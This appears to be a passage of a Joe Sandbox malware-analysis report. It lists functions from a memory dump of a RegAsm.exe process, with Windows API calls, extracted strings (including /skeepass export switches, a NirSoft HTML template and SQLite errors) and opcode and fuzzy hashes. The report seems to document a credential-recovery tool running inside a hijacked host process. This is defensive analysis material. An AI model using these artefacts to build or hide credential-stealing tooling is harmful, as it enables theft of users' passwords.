                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$FullNamePath$malloc$Version
                                                                                • String ID: |A
                                                                                • API String ID: 4233704886-1717621600
                                                                                • Opcode ID: 7e01f0dee03851588a79a4a26fa611e8dffd0452dbc09a85c2cc2e741f239264
                                                                                • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                • Opcode Fuzzy Hash: 7e01f0dee03851588a79a4a26fa611e8dffd0452dbc09a85c2cc2e741f239264
                                                                                • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsicmp
                                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                • API String ID: 2081463915-1959339147
                                                                                • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 004121FF
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                • SelectObject.GDI32(?,?), ref: 00412251
                                                                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                • SetCursor.USER32(00000000), ref: 004122BC
                                                                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                • memcpy.MSVCRT ref: 0041234D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                • String ID:
                                                                                • API String ID: 1700100422-0
                                                                                • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                • String ID:
                                                                                • API String ID: 552707033-0
                                                                                • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$_snwprintf
                                                                                • String ID: %%0.%df
                                                                                • API String ID: 3473751417-763548558
                                                                                • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                • GetTickCount.KERNEL32 ref: 0040610B
                                                                                • GetParent.USER32(?), ref: 00406136
                                                                                • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                • String ID: A
                                                                                • API String ID: 2892645895-3554254475
                                                                                • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                • memset.MSVCRT ref: 0040DA23
                                                                                • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                • String ID: caption
                                                                                • API String ID: 973020956-4135340389
                                                                                • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$_snwprintf$wcscpy
                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                • API String ID: 1283228442-2366825230
                                                                                • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • wcschr.MSVCRT ref: 00413972
                                                                                • wcscpy.MSVCRT ref: 00413982
                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                • wcscpy.MSVCRT ref: 004139D1
                                                                                • wcscat.MSVCRT ref: 004139DC
                                                                                • memset.MSVCRT ref: 004139B8
                                                                                  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                • memset.MSVCRT ref: 00413A00
                                                                                • memcpy.MSVCRT ref: 00413A1B
                                                                                • wcscat.MSVCRT ref: 00413A27
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                • String ID: \systemroot
                                                                                • API String ID: 4173585201-1821301763
                                                                                • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                Function 0041352F Relevance: 17.5, APIs: 1, Strings: 9, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                • API String ID: 4139908857-2887671607
                                                                                • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                Function 0040C084 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 110stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                                                • memcpy.MSVCRT ref: 0040C11B
                                                                                • strchr.MSVCRT ref: 0040C140
                                                                                • strchr.MSVCRT ref: 0040C151
                                                                                • _strlwr.MSVCRT ref: 0040C15F
                                                                                • memset.MSVCRT ref: 0040C17A
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                • String ID: 4$h
                                                                                • API String ID: 4019544885-1856150674
                                                                                • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                • String ID: 0$6
                                                                                • API String ID: 4066108131-3849865405
                                                                                • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004082EF
                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                • memset.MSVCRT ref: 00408362
                                                                                • memset.MSVCRT ref: 00408377
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 290601579-0
                                                                                • Opcode ID: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                                • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                • Opcode Fuzzy Hash: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                                • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$wcslen
                                                                                • String ID:
                                                                                • API String ID: 239872665-3916222277
                                                                                • Opcode ID: 6ece4f15149c4f8b0f1e95fdfa43d3662bfdaf9dea83468c5f0cbecd63c28e51
                                                                                • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                • Opcode Fuzzy Hash: 6ece4f15149c4f8b0f1e95fdfa43d3662bfdaf9dea83468c5f0cbecd63c28e51
                                                                                • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                                • String ID: %s (%s)$YV@
                                                                                • API String ID: 3979103747-598926743
                                                                                • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                • wcslen.MSVCRT ref: 0040A6B1
                                                                                • wcscpy.MSVCRT ref: 0040A6C1
                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                • wcscpy.MSVCRT ref: 0040A6DB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                • String ID: Unknown Error$netmsg.dll
                                                                                • API String ID: 2767993716-572158859
                                                                                • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                • wcscpy.MSVCRT ref: 0040DAFB
                                                                                • wcscpy.MSVCRT ref: 0040DB0B
                                                                                • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                  • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                • API String ID: 3176057301-2039793938
                                                                                • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • out of memory, xrefs: 0042F865
                                                                                • unable to open database: %s, xrefs: 0042F84E
                                                                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                • too many attached databases - max %d, xrefs: 0042F64D
                                                                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                • database %s is already in use, xrefs: 0042F6C5
                                                                                • database is already attached, xrefs: 0042F721
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpymemset
                                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                • API String ID: 1297977491-2001300268
                                                                                • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                • memcpy.MSVCRT ref: 0040EB80
                                                                                • memcpy.MSVCRT ref: 0040EB94
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
